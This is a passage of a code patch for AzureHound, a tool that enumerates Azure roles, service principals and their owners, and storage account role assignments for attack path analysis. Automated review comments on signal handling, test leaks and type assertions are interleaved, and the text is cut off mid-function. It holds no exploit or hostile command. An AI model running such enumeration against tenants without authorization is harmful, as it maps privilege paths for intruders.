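Review bot: `signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)` in listRolesCmdImpl (cmd/list-roles.go) registers a signal that cannot be trapped, so `os.Kill` has no effect here. SIGTERM, which service managers and container runtimes normally send on stop, is not registered and therefore never cancels `ctx`. If a clean stop on termination is intended, register `syscall.SIGTERM` in place of `os.Kill` (this needs the `syscall` import). The same call is in listRoleAssignmentsCmdImpl, listCmdImpl, listServicePrincipalOwnersCmdImpl, listServicePrincipalsCmdImpl, listStorageAccountRoleAssignmentsImpl and listStorageAccountsCmdImpl in this patch.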
@@ -0,0 +1,69 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListRoles(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.Role]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADRoles(gomock.Any(), gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.Role]{ + Ok: azure.Role{}, + } + mockChannel <- client.AzureResult[azure.Role]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.Role]{ + Ok: azure.Role{}, + } + }() + + channel := listRoles(ctx, mockClient) + result := <-channel + if _, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } + + if _, ok := <-channel; ok { + t.Error("expected channel to close from 
an error result but it did not")
+ }
+}
diff --git a/cmd/list-root.go b/cmd/list-root.go
new file mode 100644
index 0000000..fb0d05d
--- /dev/null
+++ b/cmd/list-root.go
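Review bot: The producer goroutine in TestListRoles (cmd/list-roles_test.go) sends a third value after the error result, but listRoles returns on the first error and stops reading. That send on the unbuffered `mockChannel` therefore blocks forever and `defer close(mockChannel)` never runs, so the goroutine outlives the test and would trip a goroutine-leak checker. Give the mock channel room for all three sends, `mockChannel := make(chan client.AzureResult[azure.Role], 3)`; the assertions stay as they are. TestListServicePrincipals in this patch has the same shape.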
@@ -0,0 +1,70 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + config.Init(listRootCmd, append(config.AzureConfig, config.OutputFile)) + rootCmd.AddCommand(listRootCmd) +} + +var listRootCmd = &cobra.Command{ + Use: "list", + Short: "Lists Azure Objects", + Run: listCmdImpl, + PersistentPreRunE: persistentPreRunE, + SilenceUsage: true, +} + +func listCmdImpl(cmd *cobra.Command, args []string) { + if len(args) > 0 { + exit(fmt.Errorf("unsupported subcommand: %v", args)) + } + + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure objects...") + start := time.Now() + stream := listAll(ctx, azClient) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAll(ctx context.Context, client client.AzureClient) <-chan interface{} { + var ( + azureAD = listAllAD(ctx, client) + azureRM = listAllRM(ctx, client) + ) 
+ return pipeline.Mux(ctx.Done(), azureAD, azureRM)
+}
diff --git a/cmd/list-service-principal-owners.go b/cmd/list-service-principal-owners.go
new file mode 100644
index 0000000..2f209ac
--- /dev/null
+++ b/cmd/list-service-principal-owners.go
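Review bot: listCmdImpl in cmd/list-root.go is the only command implementation in this patch that does not call `panicrecovery.HandleBubbledPanic(ctx, stop, log)` before `outputStream`; listRolesCmdImpl, listServicePrincipalsCmdImpl and the other per-object commands all do. HandleBubbledPanic is defined outside this hunk, so the effect is inferred: if it is what cancels the run once a collector goroutine's panic has been recovered, a panic under the aggregate `list` command would not stop collection the way it does for the single-object commands. Add the call after `stream := listAll(ctx, azClient)`, or leave a comment saying why the aggregate command does not need it.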
@@ -0,0 +1,132 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listServicePrincipalOwnersCmd) +} + +var listServicePrincipalOwnersCmd = &cobra.Command{ + Use: "service-principal-owners", + Long: "Lists Azure AD Service Principal Owners", + Run: listServicePrincipalOwnersCmdImpl, + SilenceUsage: true, +} + +func listServicePrincipalOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure service principal owners...") + start := time.Now() + stream := listServicePrincipalOwners(ctx, azClient, listServicePrincipals(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, 
stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listServicePrincipalOwners(ctx context.Context, client client.AzureClient, servicePrincipals <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), servicePrincipals) { + if servicePrincipal, ok := result.(AzureWrapper).Data.(models.ServicePrincipal); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating service principal owners", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, servicePrincipal.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + servicePrincipalOwners = models.ServicePrincipalOwners{ + ServicePrincipalId: id, + } + count = 0 + ) + for item := range client.ListAzureADServicePrincipalOwners(ctx, id, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing owners for this service principal", "servicePrincipalId", id) + } else { + servicePrincipalOwner := models.ServicePrincipalOwner{ + Owner: item.Ok, + ServicePrincipalId: id, + } + log.V(2).Info("found service principal owner", "servicePrincipalOwner", servicePrincipalOwner) + count++ + servicePrincipalOwners.Owners = append(servicePrincipalOwners.Owners, servicePrincipalOwner) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZServicePrincipalOwner, + Data: servicePrincipalOwners, + }); !ok { + return + } + log.V(1).Info("finished listing service principal owners", "servicePrincipalId", id, "count", 
count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all service principal owners")
+ }()
+
+ return out
+}
diff --git a/cmd/list-service-principal-owners_test.go b/cmd/list-service-principal-owners_test.go
new file mode 100644
index 0000000..61f6eb5
--- /dev/null
+++ b/cmd/list-service-principal-owners_test.go
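Review bot: In listServicePrincipalOwners (cmd/list-service-principal-owners.go), `result.(AzureWrapper).Data.(models.ServicePrincipal)` checks only the second assertion. The first, `result.(AzureWrapper)`, is the single-value form and panics if the upstream channel ever carries anything else, so the `failed type assertion` log line is not reached in that case. The deferred `panicrecovery.PanicRecovery()` presumably catches it, but the collector then ends through the panic path instead of the logged error path. Split the assertion, e.g. `wrapper, ok := result.(AzureWrapper)` followed by `servicePrincipal, ok := wrapper.Data.(models.ServicePrincipal)`, and log and return on either failure. listRoleAssignments, listStorageAccountRoleAssignments and listStorageAccounts in this patch use the same expression.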
@@ -0,0 +1,102 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "encoding/json" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListServicePrincipalOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockServicePrincipalsChannel := make(chan interface{}) + mockServicePrincipalOwnerChannel := make(chan client.AzureResult[json.RawMessage]) + mockServicePrincipalOwnerChannel2 := make(chan client.AzureResult[json.RawMessage]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADServicePrincipalOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockServicePrincipalOwnerChannel).Times(1) + mockClient.EXPECT().ListAzureADServicePrincipalOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockServicePrincipalOwnerChannel2).Times(1) + channel := listServicePrincipalOwners(ctx, mockClient, 
mockServicePrincipalsChannel) + + go func() { + defer close(mockServicePrincipalsChannel) + mockServicePrincipalsChannel <- AzureWrapper{ + Data: models.ServicePrincipal{}, + } + mockServicePrincipalsChannel <- AzureWrapper{ + Data: models.ServicePrincipal{}, + } + }() + go func() { + defer close(mockServicePrincipalOwnerChannel) + mockServicePrincipalOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockServicePrincipalOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + }() + go func() { + defer close(mockServicePrincipalOwnerChannel2) + mockServicePrincipalOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockServicePrincipalOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.ServicePrincipalOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.ServicePrincipalOwners{}) + } else if len(data.Owners) != 2 { + t.Errorf("got %v, want %v", len(data.Owners), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.ServicePrincipalOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.ServicePrincipalOwners{}) + } else if len(data.Owners) != 1 { + t.Errorf("got %v, want %v", len(data.Owners), 1) + } +} diff --git a/cmd/list-service-principals.go b/cmd/list-service-principals.go new file mode 100644 index 0000000..5d427af --- /dev/null +++ b/cmd/list-service-principals.go 
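Review bot: TestListServicePrincipalOwners (cmd/list-service-principal-owners_test.go) expects the result with two owners first and the one with a single owner second, but listServicePrincipalOwners starts one worker per stream returned by `pipeline.Demux`. `config.ColStreamCount` is set outside this hunk; if it yields more than one stream during tests, the two ids can be handled by different workers and either result can reach `out` first, making the test order-dependent. Collect both results and compare the owner counts as a set, or pin the stream count to 1 for the test. The test also never checks that `channel` is closed after the second result, which the resource-group test just above it in this patch does.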
@@ -0,0 +1,91 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listServicePrincipalsCmd) +} + +var listServicePrincipalsCmd = &cobra.Command{ + Use: "service-principals", + Long: "Lists Azure Active Directory Service Principals", + Run: listServicePrincipalsCmdImpl, + SilenceUsage: true, +} + +func listServicePrincipalsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory service principals...") + start := time.Now() + stream := listServicePrincipals(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func 
listServicePrincipals(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureADServicePrincipals(ctx, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing service principals") + return + } else { + log.V(2).Info("found service principal", "servicePrincipal", item) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZServicePrincipal, + Data: models.ServicePrincipal{ + ServicePrincipal: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + }, + }); !ok { + return + } + } + } + log.Info("finished listing all service principals", "count", count) + }() + + return out +} diff --git a/cmd/list-service-principals_test.go b/cmd/list-service-principals_test.go new file mode 100644 index 0000000..b9058fa --- /dev/null +++ b/cmd/list-service-principals_test.go 
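Review bot: The parameter `client client.AzureClient` of listServicePrincipals (cmd/list-service-principals.go) shadows the imported `client` package for the whole function body, so a reader has to track which `client` is meant. The callers already use `azClient`, and the signature could read `func listServicePrincipals(ctx context.Context, azClient client.AzureClient) <-chan interface{}`. The `else` after the `return` in the error branch can also go, which flattens the loop by one level. `client.TenantInfo()` is evaluated twice per item; one call before the loop would do if the tenant is fixed for the run, which is not visible here. listRoles and the other collectors in this patch share the pattern.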
@@ -0,0 +1,69 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListServicePrincipals(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.ServicePrincipal]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADServicePrincipals(gomock.Any(), gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.ServicePrincipal]{ + Ok: azure.ServicePrincipal{}, + } + mockChannel <- client.AzureResult[azure.ServicePrincipal]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.ServicePrincipal]{ + Ok: azure.ServicePrincipal{}, + } + }() + + channel := listServicePrincipals(ctx, mockClient) + result := <-channel + if _, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want 
%T", result, AzureWrapper{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("expected channel to close from an error result but it did not")
+ }
+}
diff --git a/cmd/list-storage-account-role-assignments.go b/cmd/list-storage-account-role-assignments.go
new file mode 100644
index 0000000..af97baf
--- /dev/null
+++ b/cmd/list-storage-account-role-assignments.go
@@ -0,0 +1,136 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listStorageAccountRoleAssignment) +} + +var listStorageAccountRoleAssignment = &cobra.Command{ + Use: "storage-account-role-assignments", + Long: "Lists Azure Storage Account Role Assignments", + Run: listStorageAccountRoleAssignmentsImpl, + SilenceUsage: true, +} + +func listStorageAccountRoleAssignmentsImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure storage account role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listStorageAccountRoleAssignments(ctx, azClient, listStorageAccounts(ctx, azClient, subscriptions)) + 
panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listStorageAccountRoleAssignments(ctx context.Context, client client.AzureClient, storageAccounts <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), storageAccounts) { + if storageAccount, ok := result.(AzureWrapper).Data.(models.StorageAccount); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating storage account role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, storageAccount.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + storageAccountRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this storage account", "storageAccountId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + storageAccountRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("found storage account role assignment", "storageAccountRoleAssignment", storageAccountRoleAssignment) + count++ + storageAccountRoleAssignments.RoleAssignments = append(storageAccountRoleAssignments.RoleAssignments, storageAccountRoleAssignment) + } + } + if ok := 
pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZStorageAccountRoleAssignment,
+ Data: storageAccountRoleAssignments,
+ }); !ok {
+ return
+ }
+ log.V(1).Info("finished listing storage account role assignments", "storageAccountId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all storage account role assignments")
+ }()
+
+ return out
+}
diff --git a/cmd/list-storage-accounts.go b/cmd/list-storage-accounts.go
new file mode 100644
index 0000000..541938b
--- /dev/null
+++ b/cmd/list-storage-accounts.go
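Review bot: When `client.ListRoleAssignmentsForResource` yields an error, listStorageAccountRoleAssignments (cmd/list-storage-account-role-assignments.go) logs `unable to continue processing role assignments for this storage account` but keeps ranging and then sends whatever was gathered. The consumer cannot tell a complete assignment list from a truncated one, so a storage account whose listing failed part-way appears to have fewer role assignments than it really has. Track the failure, e.g. set `failed = true` in the error branch and `if failed { continue }` before the `SendAny`, or carry the failure in the emitted record, and make the log text match what the code does. listRoleAssignments and listServicePrincipalOwners handle errors the same way, and TestListServicePrincipalOwners pins that behaviour with its one-owner expectation.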
@@ -0,0 +1,127 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listStorageAccountsCmd)
+}
+
+var listStorageAccountsCmd = &cobra.Command{
+ Use: "storage-accounts",
+ Long: "Lists Azure Storage Accounts",
+ Run: listStorageAccountsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listStorageAccountsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure storage accounts...")
+ start := time.Now()
+ stream := listStorageAccounts(ctx, azClient, listSubscriptions(ctx, azClient))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listStorageAccounts(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+ for result := range pipeline.OrDone(ctx.Done(), subscriptions) {
+ if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating storage accounts", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ count := 0
+ for item := range client.ListAzureStorageAccounts(ctx, id) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing storage accounts for this subscription", "subscriptionId", id)
+ } else {
+ storageAccount := models.StorageAccount{
+ StorageAccount: item.Ok,
+ SubscriptionId: "/subscriptions/" + id,
+ ResourceGroupId: item.Ok.ResourceGroupId(),
+ ResourceGroupName: item.Ok.ResourceGroupName(),
+ TenantId: client.TenantInfo().TenantId,
+ }
+ log.V(2).Info("found storage account", "storageAccount", storageAccount)
+ count++
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZStorageAccount,
+ Data: storageAccount,
+ }); !ok {
+ return
+ }
+ }
+ }
+ log.V(1).Info("finished listing storage accounts", "subscriptionId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all storage accounts")
+ }()
+
+ return out
+}
diff --git a/cmd/list-storage-containers.go b/cmd/list-storage-containers.go
new file mode 100644
index 0000000..8578bf6
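Review bot: `result.(AzureWrapper)` in the first goroutine of listStorageAccounts is a single-value assertion, so a value of any other type panics before the `!ok` branch can log and return; only the inner `.Data.(models.Subscription)` assertion is actually checked. Splitting it into `wrapper, ok := result.(AzureWrapper)` and then `subscription, ok := wrapper.Data.(models.Subscription)` keeps that failure on the logged path instead of leaving it to PanicRecovery. The same pattern appears in listStorageContainers, listSubscriptionOwners, listSubscriptionRoleAssignments, listSubscriptionUserAccessAdmins and listSubscriptions. Separately, `os.Kill` in `signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)` cannot be trapped, so naming it has no effect here or in the other *CmdImpl functions of this patch.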
--- /dev/null
+++ b/cmd/list-storage-containers.go
@@ -0,0 +1,135 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listStorageContainersCmd)
+}
+
+var listStorageContainersCmd = &cobra.Command{
+ Use: "storage-containers",
+ Long: "Lists Azure Storage Containers",
+ Run: listStorageContainersCmdImpl,
+ SilenceUsage: true,
+}
+
+func listStorageContainersCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure storage containers...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ storageAccounts := listStorageAccounts(ctx, azClient, subscriptions)
+ stream := listStorageContainers(ctx, azClient, storageAccounts)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
